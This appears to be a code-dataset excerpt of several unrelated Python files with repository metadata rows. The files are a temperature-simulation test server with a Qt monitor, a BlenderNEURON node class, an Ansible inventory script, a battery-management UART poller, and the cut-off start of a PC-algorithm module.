    """Insert `action` into scene[tick][kind][role], creating the nested dicts and the set as needed."""
    by_kind = scene.setdefault(tick, {})
    by_role = by_kind.setdefault(kind, {})
    by_role.setdefault(role, set()).add(action)
def scene_add_action(scene, tick, role, action):
    """Schedule `action` to be sent to `role` at `tick`."""
    scene_add(scene, tick, 'actions', role, action)
def scene_add_expect(scene, tick, role, expect):
    """Record that `expect` must be observed from `role` at `tick`."""
    scene_add(scene, tick, 'expects', role, expect)
def scene_create():
    """Build a randomized test scene: per-room actions and the reports expected from 's'.

    For each room a random initial value `it` and target `tt` are chosen (the
    ranges come from b4.conf); the scene then expects the reported value `t`
    to step from `it` to `tt`, hold for a while, then stop (w=0) and finally
    be billed `b`.  Presumably a temperature-control simulation — semantics
    of it/tt/w are inferred from the key names; confirm against the testee
    protocol.
    """
    scene = dict()
    random.seed()
    for room_name in b4.room_names[1:]:
        it = random.randint(b4.conf['it'][0][0], b4.conf['it'][0][1])
        # Rooms after '2' draw their initial value from the second range.
        if room_name > '2':
            it = random.randint(b4.conf['it'][1][0], b4.conf['it'][1][1])
        tc = random.randint(1, 1)
        tt = random.randint(b4.conf['tt'][0], b4.conf['tt'][1])
        w = random.randint(1, 3)
        scene_add_action(scene, tc, room_name, f'it={it} tt={tt} w={w} tc={tc} ts={b4.conf["ts"]}')
        scene_add_expect(scene, tc + 1, 's', f'r={room_name} tc={tc} t={it}')
        # Step t toward the target, one unit every (4 - w) ticks.
        temp_step = 1 if it < tt else -1
        for t in range(it + temp_step, tt + temp_step, temp_step):
            tc = tc + (4 - w)
            scene_add_expect(scene, tc + 1, 's', f'r={room_name} tc={tc} t={t}')
        temp_diff = abs(tt - it)
        # Hold the target value for a random number of ticks; the bill grows
        # with both the distance travelled and the hold time.
        tick_keep_tt = random.randint(10, 20)
        bill = temp_diff * (1 + tick_keep_tt)
        for tc in range(tc, tc + tick_keep_tt):
            scene_add_expect(scene, tc + 1, 's', f'r={room_name} tc={tc} t={t}')
        tc = tc + 1
        # Switch off (w=0), then a few ticks later request the bill.
        scene_add_action(scene, tc, room_name, f'w=0 tc={tc}')
        scene_add_expect(scene, tc + 1, 's', f'r={room_name} tc={tc} w=0')
        tc = random.randint(tc + 4, tc + 5)
        scene_add_action(scene, tc, 's', f'b={room_name} tc={tc}')
        scene_add_expect(scene, tc + 1, 's', f'r={room_name} tc={tc} b={bill}')
    # Replay in tick order.
    scene = {k: scene[k] for k in sorted(scene)}
    # for tick, actions in scene.items():
    #     print(f'{tick}')
    #     for room_name, cmd in actions.items():
    #         print(f'  "{room_name}" {cmd}')
    return scene
async def scene_execute(scene, group_name, happens_all, log_prefix):
    """Replay `scene` in real time and verify the expected reports arrived.

    Sleeps (tick delta * ts) between ticks, sends each scheduled action to the
    matching room's writer, then checks that every expectation for the tick is
    a subset of some line recorded by recv_task in `happens_all` (one tick
    earlier, since reports carry the tick they happened at).  Raises B4Error
    on any miss; marks the group passed and notifies the UI on success.
    """
    prev_tick = 0
    for tick in scene.keys():
        await asyncio.sleep((tick - prev_tick) * b4.conf['ts'])
        prev_tick = tick
        log.info(f'{log_prefix} tc {tick}')
        if 'actions' in scene[tick]:
            actions = scene[tick]['actions']
            log.info(f'{log_prefix} actions {actions}')
            for room_name, commands in actions.items():
                for command in commands:
                    send_line(b4.groups[group_name]['rooms'][room_name]['w'], command)
        if 'expects' in scene[tick]:
            expects = scene[tick]['expects']['s']
            # Reports for tick N are collected under key N, checked at N+1.
            happens = happens_all.get(tick - 1, None)
            log.info(f'{log_prefix} expects {expects}')
            log.info(f'{log_prefix} happens {happens}')
            if not happens:
                raise B4Error(f'e=ExpectHappenNone')
            for expect in expects:
                expect_dict = dict_from_line(expect)
                found = False
                for happen in happens:
                    happen_dict = dict_from_line(happen)
                    # A report satisfies an expectation when it contains at
                    # least all the expected key=value pairs.
                    if set(expect_dict.items()).issubset(set(happen_dict.items())):
                        found = True
                        break
                if not found:
                    raise B4Error(f'e=ExpectHappenMiss')
    b4.groups[group_name]['pass'] = True
    b4.udp_transport.sendto(f'g={group_name} p=1'.encode('utf8'))
async def recv_task(r, group_name, happens_all, log_prefix):
    """Continuously read testee reports, bucket them by tick count and mirror them to the UI.

    Every line must carry a tc=<tick> field; lines are stored as sets under
    happens_all[tc] for scene_execute to check.  Runs until the reader fails
    or is cancelled.
    """
    while True:
        kv_dict = await recv_line(r)
        log.info(f'{log_prefix} recv {kv_dict} time={time.time()}')
        tc = kv_dict.get('tc', None)
        if not tc:
            raise B4Error(f'e=LackTickCount')
        # Re-serialize so equal reports compare equal regardless of parsing.
        line = ' '.join([f'{k}={v}' for (k, v) in kv_dict.items()])
        tc = int(tc)
        if tc in happens_all:
            happens_all[tc].add(line)
        else:
            happens_all[tc] = {line}
        # Forward to the Qt monitor over UDP.
        b4.udp_transport.sendto(f'g={group_name} {line}'.encode('utf8'))
async def t_do_testee(r, w):
    """Per-connection handler: authenticate a testee, wait for the start signal, run the test.

    The first line must carry k=<group key> and r=<room name>.  Non-'s' rooms
    just park in a read loop; the 's' (server) connection drives the test: it
    waits for i=1, requires all rooms to be connected, then runs scene_execute
    and recv_task concurrently.  Any B4Error is reported back to the testee;
    the finally block closes every connection of the group and notifies the UI.
    """
    group_name, room_name, rooms, room = None, None, None, None
    peer_host, peer_port, *_ = w.get_extra_info('peername')
    log_prefix = f'{peer_host:>15}:{peer_port:>5}'
    try:
        group_key, room_name = await recv_line(r, 'k', 'r')
        group_name = b4.conf['k'].get(group_key, None)
        if not group_name:
            raise B4Error(f'e=ErrorKey', False)
        log_prefix = f'{log_prefix} g={group_name}'
        group = b4.groups[group_name]
        # A group that already passed may not reconnect.
        if group['pass']:
            raise B4Error(f'e=AlreadyPass')
        if not room_name in list(b4.room_names):
            raise B4Error(f'e=ErrorRoom')
        log_prefix = f'{log_prefix} r={room_name}'
        rooms = group['rooms']
        if room_name in rooms:
            raise B4Error(f'e=DuplicatedRoom')
        log.info(f'{log_prefix} logined!')
        send_line(w, f'e=0')
        # Tell the UI this room is connected.
        b4.udp_transport.sendto(f'g={group_name} r={room_name} c=1'.encode('utf8'))
        room = rooms[room_name] = {'r': r, 'w': w}
        # Room connections only need to stay open; their traffic is read (and
        # discarded) here so disconnects are noticed.
        if room_name != 's':
            while True:
                await recv_line(r)
        log.info(f'{log_prefix} waiting i=1 ...')
        await recv_line(r, 'i')
        log.info(f'{log_prefix} test start!')
        if len(rooms) < len(b4.room_names):
            raise B4Error(f'e=LackRoom')
        happens_all = dict()
        task_scene = b4.loop.create_task(scene_execute(scene_create(), group_name, happens_all, log_prefix))
        task_recv = b4.loop.create_task(recv_task(r, group_name, happens_all, log_prefix))
        # done, pending = await asyncio.wait({task_scene, task_recv}, loop=b4.loop)
        result = await asyncio.gather(task_scene, task_recv, loop=b4.loop)
    except B4Error as e:
        log.warning(f'{log_prefix} exc {e.args}')
        send_line(w, e.args[0])
    except Exception as e:
        log.warning(f'{log_prefix} {e.args}')
    finally:
        if not room:
            # Login never completed: only this writer needs closing.
            w.close()
        else:
            # Tear down the whole group.
            for room_name in rooms:
                rooms[room_name]['w'].close()
                b4.udp_transport.sendto(f'g={group_name} r={room_name} c=0'.encode('utf8'))
            rooms.clear()
class BlockView(QPushButton):
    """A non-interactive colored block used as a status tile in the monitor grid."""
    # Style presets keyed by single-character state codes received over UDP
    # ('0' red, '1' green, '2' cyan, '3' yellow).
    styles = {'0': 'background:red; color:white', '1': 'background:lime; color:black',
              '2': 'background:cyan; color:black', '3': 'background:yellow; color:black'}
    def __init__(self, parent=None):
        QPushButton.__init__(self, parent)
        # Start in the '0' (red / disconnected) state; disabled so it is
        # display-only and never receives clicks.
        self.setStyleSheet(BlockView.styles['0'])
        self.setEnabled(False)
class MainWindow(QDialog):
    """Always-on-top Qt dashboard showing each test group and its rooms.

    State updates arrive as 'k=v ...' datagrams on UDP port 8999 (sent by the
    asyncio side through b4.udp_transport) and are rendered as colored blocks.
    """

    def __init__(self, parent=None):
        super().__init__(parent, Qt.WindowStaysOnTopHint | Qt.WindowMinMaxButtonsHint)
        # self.setStyleSheet('*{font:10pt Consolas}')
        self.setStyleSheet('*{font:Consolas}')
        mainLayout = QGridLayout()
        # group_name -> {'group': header tile, 'rooms': {room: [name tile, state tile]}}
        self.groups = dict()
        group_count = 0
        for group_name in b4.group_names:
            groupLayout = QVBoxLayout()
            groupLayout.setSpacing(0)
            groupLayout.setContentsMargins(0, 0, 0, 0)
            groupNameWidget = BlockView(group_name)
            roomNameWidget = BlockView('s')
            # The server role 's' gets only a name tile; rooms also get a state tile.
            rooms = {'s': [roomNameWidget]}
            groupLayout.addWidget(groupNameWidget)
            groupLayout.addWidget(roomNameWidget)
            roomsLayout = QHBoxLayout()
            for room_name in b4.room_names[1:]:
                roomNameWidget = BlockView(room_name)
                roomStateWidget = BlockView('------\n\n\n\n')
                roomStateWidget.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
                rooms[room_name] = [roomNameWidget, roomStateWidget]
                roomLayout = QVBoxLayout()
                roomLayout.addWidget(roomNameWidget)
                roomLayout.addWidget(roomStateWidget)
                roomsLayout.addLayout(roomLayout)
            self.groups[group_name] = {'group': groupNameWidget, 'rooms': rooms}
            groupLayout.addLayout(roomsLayout)
            # BUG FIX: '/' produces a float under Python 3 and QGridLayout row
            # indices must be ints; use integer division for the 3-column grid.
            mainLayout.addLayout(groupLayout, group_count // 3, group_count % 3)
            group_count = group_count + 1
        self.setLayout(mainLayout)
        self.move(923, 103)
        self.udpSocket = QUdpSocket(self)
        self.udpSocket.bind(QHostAddress.LocalHost, 8999)
        self.udpSocket.readyRead.connect(self.udpReadyRead)

    def keyPressEvent(self, event):
        # Accept (swallow) every key except Escape; Escape is ignored and,
        # since QDialog's default handler is never called, does not close
        # the dialog.
        key = event.key()
        if Qt.Key_Escape != key:
            event.accept()
        else:
            event.ignore()

    def moveEvent(self, event):
        # Show the current position in the title bar (handy for pinning
        # the hard-coded move() coordinates above).
        self.setWindowTitle(f'{self.pos()}')
        event.accept()

    def udpReadyRead(self):
        """Consume all queued datagrams and repaint the affected tiles."""
        while self.udpSocket.hasPendingDatagrams():
            data, host, port = self.udpSocket.readDatagram(self.udpSocket.pendingDatagramSize())
            data = data.decode('utf8').strip()
            # log.debug(f'{data}')
            kv_list = data.split()
            kv_dict = dict()
            for kv in kv_list:
                k, v, = kv.split('=')
                kv_dict[k] = v
            group_name = kv_dict.get('g', None)
            room_name = kv_dict.get('r', None)
            conn_bool = kv_dict.get('c', None)
            wind_speed = kv_dict.get('w', None)
            pass_bool = kv_dict.get('p', None)
            # p=1 : whole group passed -> recolor the group header tile.
            if pass_bool:
                self.groups[group_name]['group'].setStyleSheet(BlockView.styles[pass_bool])
            # c=0/1 : room connection state; on disconnect clear the state tile.
            if 'c' in kv_dict:
                self.groups[group_name]['rooms'][room_name][0].setStyleSheet(BlockView.styles[conn_bool])
                if conn_bool == '0' and room_name != 's':
                    self.groups[group_name]['rooms'][room_name][1].setStyleSheet(BlockView.styles[conn_bool])
                    self.groups[group_name]['rooms'][room_name][1].setText('')
            # w=<speed> : room telemetry -> render the remaining k=v pairs.
            if 'w' in kv_dict:
                # NOTE(review): both branches yield '3'; looks like a leftover
                # of a planned on/off color split — behavior kept as-is.
                wind_bool = '3' if wind_speed == '0' else '3'
                self.groups[group_name]['rooms'][room_name][1].setStyleSheet(BlockView.styles[wind_bool])
                kv_dict = {k: v for k, v in filter(lambda x: x[0] not in ('g', 'r'), kv_dict.items())}
                state = '\n'.join([f'{k:>2}={v:>3}' for (k, v) in kv_dict.items()])
                self.groups[group_name]['rooms'][room_name][1].setText(state)
def qt_main():
    """Run the Qt monitor dialog (blocking) — executed on a worker thread via run_in_executor."""
    app = QApplication(sys.argv)
    # The dialog swallows close attempts; keep the app alive regardless.
    app.setQuitOnLastWindowClosed(False)
    w = MainWindow()
    w.show()
    sys.exit(app.exec_())
async def async_main():
    """Open the local UDP channel (8998 -> 8999) used to push state updates to the Qt monitor."""
    b4.udp_transport, b4.udp_protocol = await b4.loop.create_datagram_endpoint(lambda: asyncio.DatagramProtocol(),
                                                                               local_addr=('127.0.0.1', 8998),
                                                                               remote_addr=('127.0.0.1', 8999))
if __name__ == '__main__':
    # Restore default Ctrl-C handling (Qt/asyncio would otherwise swallow it).
    signal.signal(signal.SIGINT, signal.SIG_DFL)
    with open('t.yml') as f:
        b4.conf = yaml.load(f.read(), Loader=yaml.FullLoader)
    # Invert the group table: conf['g'] maps group name -> [key, ...];
    # conf['k'] maps key -> group name for login lookups.
    b4.conf['k'] = {v[0]: k for k, v in b4.conf['g'].items()}
    b4.group_names = list(b4.conf['g'].keys())
    b4.groups = {group_name: {'pass': None, 'rooms': dict()} for group_name in b4.group_names}
    log.debug(f'{b4.conf["k"]} {b4.group_names}')
    # udp datagram_point cannot used in win32 protocor event loop
    # if sys.platform == 'win32': asyncio.set_event_loop(asyncio.ProactorEventLoop())
    b4.loop = asyncio.get_event_loop()
    b4.loop.run_until_complete(async_main())
    coro = asyncio.start_server(t_do_testee, None, b4.conf['tester']['port'], loop=b4.loop)
    server = b4.loop.run_until_complete(coro)
    print(f'listening {server.sockets[0].getsockname()}')
    # Qt runs on an executor thread; the asyncio loop owns the main thread.
    b4.loop.run_in_executor(None, qt_main)
    b4.loop.run_forever()
    server.close()
    # BUG FIX: was b4.loop.run_untile_complete (typo) -> AttributeError on shutdown.
    b4.loop.run_until_complete(server.wait_closed())
| 37.956012 | 118 | 0.565402 | 1,647 | 12,943 | 4.27201 | 0.175471 | 0.039795 | 0.017055 | 0.012507 | 0.273451 | 0.203525 | 0.183485 | 0.145111 | 0.120665 | 0.089966 | 0 | 0.019772 | 0.296608 | 12,943 | 340 | 119 | 38.067647 | 0.753076 | 0.047052 | 0 | 0.061069 | 0 | 0.003817 | 0.107328 | 0.005258 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041985 | false | 0.030534 | 0.049618 | 0 | 0.122137 | 0.003817 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf8ee76e1f64b536bad62c4443845e7dcf14d0c8 | 5,872 | py | Python | blenderneuron/blender/blendernode.py | Helveg/BlenderNEURON | 7297e6aa45722f35908b707d0020b0519a6bc60d | [
"MIT"
] | 19 | 2018-02-09T21:30:25.000Z | 2022-03-21T23:02:26.000Z | blenderneuron/blender/blendernode.py | Helveg/BlenderNEURON | 7297e6aa45722f35908b707d0020b0519a6bc60d | [
"MIT"
] | 30 | 2019-04-16T02:38:24.000Z | 2022-03-19T18:42:58.000Z | blenderneuron/blender/blendernode.py | Helveg/BlenderNEURON | 7297e6aa45722f35908b707d0020b0519a6bc60d | [
"MIT"
] | 5 | 2018-07-23T16:49:59.000Z | 2022-03-02T18:48:07.000Z | import bpy
from blenderneuron.blender.blenderroot import BlenderRoot
from blenderneuron.blender.blenderrootgroup import *
from blenderneuron.commnode import CommNode
class BlenderNode(CommNode):
    """Blender-side communication node: mirrors NEURON root sections as cell groups."""

    def __init__(self, *args, **kwargs):
        super(BlenderNode, self).__init__("Blender", *args, **kwargs)

    @property
    def ui_properties(self):
        # The add-on's property group lives on the first scene.
        return bpy.data.scenes[0].BlenderNEURON

    def add_group(self, name=None, include_groupless_roots=True):
        """Create a new cell group (auto-named when `name` is None) and register it in the UI."""
        self.update_root_index()
        if name is None:
            name = self.find_unique_group_name()
        group = BlenderRootGroup(name, self)
        # Attach group to node
        self.groups[name] = group
        # Add group to the UI list
        group.add_to_UI()
        if include_groupless_roots:
            group.add_groupless_roots()
        return group

    def update_root_index(self):
        """Synchronize self.root_index with the root sections currently present in NEURON."""
        # Keep track which roots have been removed from NRN
        roots_to_delete = set(self.root_index.keys())
        # Get the list of root sections from NEURON
        try:
            root_data = self.client.get_roots()
            # Update new or existing root entries
            for i, root_info in enumerate(root_data):
                name = root_info["name"]
                existing_root = self.root_index.get(name)
                # Update existing root
                if existing_root is not None:
                    existing_root.index = root_info["index"]
                    existing_root.name = root_info["name"]
                    # Don't remove roots that previously existed and are present
                    roots_to_delete.remove(name)
                # Add a new root
                else:
                    new_root = self.root_index[name] = BlenderRoot(
                        root_info["index"],
                        root_info["name"]
                    )
                    # Make sure it's listed as selectable in all groups
                    for group in self.groups.values():
                        new_root.add_to_UI_group(group.ui_group)
        except ConnectionRefusedError:
            # NEURON unreachable: treat as "no roots", so every stale entry
            # below gets removed.
            root_data = []
        finally:
            # Delete removed roots
            for name_to_delete in roots_to_delete:
                self.root_index[name_to_delete].remove(node=self)

    def find_unique_group_name(self):
        """Return the first unused 'Group.NNN' name."""
        i_name = len(self.groups.values())
        while True:
            name = "Group." + str(i_name).zfill(3)
            if name in self.groups:
                i_name += 1
            else:
                break
        return name

    def get_group_data_from_neuron(self, group_list):
        """Fetch the full (decompressed) data of the given groups from NEURON."""
        # Convert blender groups to skeletal dicts (needed for XML rcp with NRN)
        # These dicts contain basic information (e.g. no 3D data, activity)
        blender_groups = self.get_group_dicts(group_list)
        # Send a request to NRN for the selected groups
        compressed = self.client.initialize_groups(blender_groups)
        # Decompress the result
        nrn_groups = self.decompress(compressed)
        return nrn_groups

    def import_groups_from_neuron(self, group_list):
        """Replace each group's contents with fresh data pulled from NEURON."""
        nrn_groups = self.get_group_data_from_neuron(group_list)
        # Update each blender node group with the data received from NRN
        for nrn_group in nrn_groups:
            node_group = self.groups[nrn_group["name"]]
            print('Importing group: ' + node_group.name + ' from NEURON...')
            # Remove any views of the cells
            if node_group.view is not None:
                node_group.view.remove()
                node_group.view = None
            # Update blender node group with the data received from NRN
            node_group.from_full_NEURON_group(nrn_group)

    def get_selected_groups(self):
        """Return the groups whose 'selected' flag is set."""
        return [group for group in self.groups.values() if group.selected]

    def get_group_dicts(self, group_list):
        """Serialize each group in `group_list` to its dict form."""
        return [group.to_dict() for group in group_list]

    @property
    def synapse_sets(self):
        # Synapse sets are stored on the active scene's property group.
        return bpy.context.scene.BlenderNEURON.synapse_sets

    def add_synapse_set(self, name=None):
        """Append a new synapse set, auto-naming it 'SynapseSet.NNN' when `name` is None."""
        new_set = self.synapse_sets.add()
        if name is None:
            i_name = len(self.synapse_sets.values())
            while True:
                name = "SynapseSet." + str(i_name).zfill(3)
                if name in self.synapse_sets.keys():
                    i_name += 1
                else:
                    break
        new_set.name = name
        return new_set

    def display_groups(self):
        """Show selected groups in the 3D view and remove the views of unselected ones."""
        for group in self.groups.values():
            if group.selected:
                print('Showing group ' + group.name + ' in Blender')
                group.show()
            else:
                group.remove_view()

    def add_neon_effect(self):
        """
        Adds glare filter to the compositing node tree
        :return:
        """
        scene = bpy.context.scene
        scene.use_nodes = True
        links = scene.node_tree.links
        nodes = scene.node_tree.nodes
        # Reuse existing render-layers / composite nodes when present.
        layers = nodes.get('Render Layers')
        if layers is None:
            layers = nodes.new('CompositorNodeRLayers')
        glare = nodes.new('CompositorNodeGlare')
        composite = nodes.get('Composite')
        if composite is None:
            composite = nodes.new('CompositorNodeComposite')
        # Wire: render layers -> glare -> composite output.
        links.new(layers.outputs['Image'], glare.inputs['Image'])
        links.new(glare.outputs['Image'], composite.inputs['Image'])
        glare.quality = 'MEDIUM'
        glare.iterations = 3
        glare.color_modulation = 0.2
        glare.threshold = 0.1
        glare.streaks = 7
        glare.fade = 0.75
| 30.268041 | 81 | 0.56812 | 676 | 5,872 | 4.744083 | 0.252959 | 0.022451 | 0.016215 | 0.013096 | 0.110384 | 0.076084 | 0.067976 | 0.067976 | 0.067976 | 0 | 0 | 0.003957 | 0.354394 | 5,872 | 193 | 82 | 30.42487 | 0.841994 | 0.128236 | 0 | 0.142857 | 0 | 0 | 0.04469 | 0.00902 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116071 | false | 0 | 0.053571 | 0.035714 | 0.25 | 0.017857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf90f187c224578a009a7b143999adefdfe7e863 | 3,383 | py | Python | inventory/zero.py | fbartels/zero | 370becc20bc6b89b4453ce71af31c4e5da972372 | [
"MIT"
] | null | null | null | inventory/zero.py | fbartels/zero | 370becc20bc6b89b4453ce71af31c4e5da972372 | [
"MIT"
] | null | null | null | inventory/zero.py | fbartels/zero | 370becc20bc6b89b4453ce71af31c4e5da972372 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import os
import sys
import argparse
import subprocess
try:
import json
except ImportError:
import simplejson as json
class ZeroInventory(object):
    """Ansible dynamic-inventory script for the 'zero' cluster.

    With --list (or --host) a JSON inventory is printed, built either from
    the ZERO_NODES environment variable or, when TERRAFORM_ENABLED is set,
    by delegating to the external `terraform-inventory` binary.  With no
    flag an empty inventory is printed.
    """

    def __init__(self):
        self.inventory = {}
        self.read_cli_args()
        # Called with `--list`.
        if self.args.list:
            self.inventory = self.zero_inventory()
        # Called with `--host [hostname]`.  Not implemented separately,
        # since `--list` already returns per-host vars under _meta.
        elif self.args.host:
            self.inventory = self.zero_inventory()
        # If no groups or vars are requested, return an empty inventory.
        else:
            # BUG FIX: empty_inventory() returns a dict; printing the dict
            # emitted Python repr (single quotes), which is not valid JSON.
            self.inventory = json.dumps(self.empty_inventory())
        print(self.inventory)

    def zero_inventory(self):
        """Build the inventory and return it as a JSON string."""
        inventory = {
            "all": {
                "hosts": []
            },
            "_meta": {
                "hostvars": {}
            }
        }
        # TERRAFORM_ENABLED selects the source of truth for the node list.
        terraform_enabled = int(os.getenv('TERRAFORM_ENABLED', 0))
        if not terraform_enabled:
            # Custom inventory: ZERO_NODES is a comma-separated address list;
            # nodes are named zero-1, zero-2, ...
            zero_nodes = os.getenv('ZERO_NODES', "")
            if zero_nodes and zero_nodes != "":
                i = 1
                for node in zero_nodes.split(","):
                    inventory['all']['hosts'].append("zero-{}".format(i))
                    inventory['_meta']['hostvars']["zero-{}".format(i)] = {
                        "ansible_host": node
                    }
                    i += 1
            # Every node belongs to the docker and manager groups.
            inventory["docker"] = []
            for node in inventory['all']['hosts']:
                inventory["docker"].append(node)
            inventory["manager"] = []
            for node in inventory['all']['hosts']:
                inventory["manager"].append(node)
            # swarm spans the docker group; storidge spans the managers.
            inventory["swarm"] = {
                "children": ["docker"]
            }
            inventory["storidge"] = {
                "children": ["manager"]
            }
            inventory = json.dumps(inventory)
        else:
            # Delegate to terraform-inventory, pointed at our Terraform state.
            inventory_path = os.path.dirname(os.path.abspath(__file__))
            tf_path = "{}/{}".format(inventory_path, "../terraform/")
            os.environ["TF_STATE"] = tf_path
            os.environ["TF_HOSTNAME_KEY_NAME"] = "name"
            args = sys.argv[1:]
            command = ["/usr/local/bin/terraform-inventory"] + args + [tf_path]
            process = subprocess.run(command, check=True, stdout=subprocess.PIPE, universal_newlines=True)
            inventory = process.stdout
        return inventory

    def empty_inventory(self):
        """Return the minimal inventory dict Ansible accepts."""
        return {'_meta': {'hostvars': {}}}

    def read_cli_args(self):
        """Parse the --list / --host flags Ansible passes to inventory scripts."""
        parser = argparse.ArgumentParser()
        parser.add_argument('--list', action = 'store_true')
        parser.add_argument('--host', action = 'store')
        self.args = parser.parse_args()
# Get the inventory.
ZeroInventory() | 32.219048 | 106 | 0.516406 | 331 | 3,383 | 5.132931 | 0.362538 | 0.037081 | 0.040024 | 0.02472 | 0.081224 | 0.081224 | 0.041201 | 0 | 0 | 0 | 0 | 0.002328 | 0.365061 | 3,383 | 105 | 107 | 32.219048 | 0.788641 | 0.155779 | 0 | 0.085714 | 0 | 0 | 0.107042 | 0.011972 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057143 | false | 0 | 0.1 | 0.014286 | 0.2 | 0.014286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf92f177f7ec59a72d055c6c761cbe15cbc82589 | 1,743 | py | Python | bms_fsm.py | dsoto/ASI-ENNOID-dashboard | 8391b4acee770306931c3cf46fd46ec6e96eb4ba | [
"CC-BY-4.0"
] | 1 | 2022-03-03T21:38:06.000Z | 2022-03-03T21:38:06.000Z | bms_fsm.py | dsoto/ASI-ENNOID-dashboard | 8391b4acee770306931c3cf46fd46ec6e96eb4ba | [
"CC-BY-4.0"
] | null | null | null | bms_fsm.py | dsoto/ASI-ENNOID-dashboard | 8391b4acee770306931c3cf46fd46ec6e96eb4ba | [
"CC-BY-4.0"
] | null | null | null | import board
import busio
import struct
import time
class BMS_FSM():
    """Polls a BMS (battery management system) over UART and merges the
    decoded telemetry into the shared vehicle_data dict on each update()."""

    def __init__(self):
        # self.bms_uart = busio.UART(board.TX, board.RX, baudrate=115200) # Feather M4
        self.bms_uart = busio.UART(board.D18, board.D19, baudrate=115200) # Grand Central
        # Fixed request frame sent each cycle to ask for one telemetry
        # packet (presumably STX/id/len/command/checksum/ETX — TODO confirm
        # the framing against the BMS protocol docs).
        self.bms_request = bytes([0x02, 0x01, 0x04, 0x40, 0x84, 0x03])
        self.response = []
        self.state = 'request'

    def update(self, vehicle_data):
        """Send one request, decode the reply, and return vehicle_data.

        On decode failure (UART timeout makes read() return None, or the
        frame is short/garbled) the dict is returned unchanged and state
        stays 'process' until a good frame arrives.
        """
        # The original request/process FSM split was collapsed: both
        # branches had degenerated into `if True:`.  The state attribute is
        # kept so external observers see the same values as before.
        self.bms_uart.write(self.bms_request)
        self.state = 'process'
        try:
            self.response = self.bms_uart.read(48)  # ENNOID 48, DBMS 53
            # Big-endian fields at fixed offsets; values scaled by /1000
            # (presumably mV -> V) and /10 (presumably 0.1 C units) — confirm.
            vehicle_data['battery_voltage_BMS'] = struct.unpack('>L', self.response[3:7])[0] / 1000.
            vehicle_data['battery_current_BMS'] = -struct.unpack('>l', self.response[7:11])[0] / 1000.
            vehicle_data['high_cell_voltage'] = struct.unpack('>L', self.response[12:16])[0] / 1000.0
            vehicle_data['low_cell_voltage'] = struct.unpack('>L', self.response[20:24])[0] / 1000.0
            vehicle_data['high_battery_temp'] = struct.unpack('>h', self.response[34:36])[0] / 10.0
            vehicle_data['high_BMS_temp'] = struct.unpack('>h', self.response[38:40])[0] / 10.0
            self.state = 'request'
        except (TypeError, struct.error):
            # BUG FIX: was a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit.  TypeError covers a timed-out
            # read() returning None; struct.error covers short frames.
            print('BMS response failed')
        return vehicle_data
| 37.891304 | 106 | 0.567413 | 217 | 1,743 | 4.410138 | 0.373272 | 0.103448 | 0.045977 | 0.071055 | 0.282132 | 0.246604 | 0.075235 | 0 | 0 | 0 | 0 | 0.074014 | 0.286862 | 1,743 | 45 | 107 | 38.733333 | 0.695897 | 0.189902 | 0 | 0.148148 | 0 | 0 | 0.109364 | 0 | 0 | 0 | 0.017155 | 0 | 0 | 1 | 0.074074 | false | 0 | 0.148148 | 0 | 0.296296 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf94ecc0db6e188b273d33a45521f2cb0f748165 | 7,660 | py | Python | further/pc_algorithm.py | alan-turing-institute/pcit | d8e3b7894d1ecbfed3a3405a31276ff4e9122f67 | [
"MIT"
] | 4 | 2018-11-06T09:54:44.000Z | 2022-01-19T20:23:50.000Z | further/pc_algorithm.py | alan-turing-institute/pcit | d8e3b7894d1ecbfed3a3405a31276ff4e9122f67 | [
"MIT"
] | 1 | 2018-02-04T18:10:43.000Z | 2018-02-04T18:10:43.000Z | further/pc_algorithm.py | alan-turing-institute/pcit | d8e3b7894d1ecbfed3a3405a31276ff4e9122f67 | [
"MIT"
] | 2 | 2018-12-26T10:06:25.000Z | 2020-03-19T03:37:32.000Z | import itertools
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np
from pcit.IndependenceTest import pred_indep
class descendants():
    """Traversal helpers over an oriented adjacency matrix.

    ``skeleton[i, j] == 2`` marks a directed edge i -> j and ``1`` an
    undirected edge.  ``desc`` accumulates discovered descendants across
    calls on the same instance.
    """

    def __init__(self, skeleton):
        self.skeleton = skeleton
        self.desc = list()

    def dir_desc(self, i):
        """Append i's direct children (edge code 2) to desc; return desc."""
        size = self.skeleton.shape[1]
        for node in range(size):
            if self.skeleton[i, node] == 2 and node not in self.desc:
                self.desc.append(node)
        return self.desc

    def all_desc(self, i):
        """Transitively close desc over directed edges reachable from i."""
        self.dir_desc(i)
        previous = -1
        while previous < len(self.desc):
            previous = len(self.desc)
            for node in list(self.desc):
                self.dir_desc(node)
        return self.desc

    def undir_neighb(self, i):
        """Return nodes joined to i by an undirected edge (code 1)."""
        size = self.skeleton.shape[1]
        return [node for node in range(size) if self.skeleton[i, node] == 1]
class find_dag():
    """PC-style causal structure discovery over the columns of X.

    Edge coding in ``self.skeleton``: 0 = no edge, 1 = undirected edge,
    2 = directed edge (row -> column).  ``pc_skeleton()`` learns the
